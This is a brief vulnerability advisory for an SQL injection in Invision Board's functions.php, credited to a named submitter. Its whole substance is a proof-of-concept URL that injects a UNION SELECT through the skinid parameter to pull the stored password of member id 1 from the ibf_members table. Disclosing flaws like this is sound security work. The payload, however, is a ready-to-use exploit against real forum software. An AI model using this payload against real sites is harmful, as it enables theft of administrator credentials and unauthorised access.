Invision Board functions.php SQL Injection Vulnerability

Invision Board functions.php SQL Injection Vulnerability

The following proof of concept has been submitted by Timo 'SiGiN' Valeri <sigin@ukr.net>:

http://www.example.com/index.php?skinid=99+AND+s.hidden%3D0+UNION+SELECT+s.*%2C+t.template%2C+c.password+FROM+ibf_skins+s+LEFT+JOIN+ibf_templates+t+ON+%28t.tmid%3Ds.tmpl_id%
29+LEFT+JOIN+ibf_members+c+ON+%28c.id%3D1%29+WHERE+s.sid%3D1+AND+s.hidden%3D0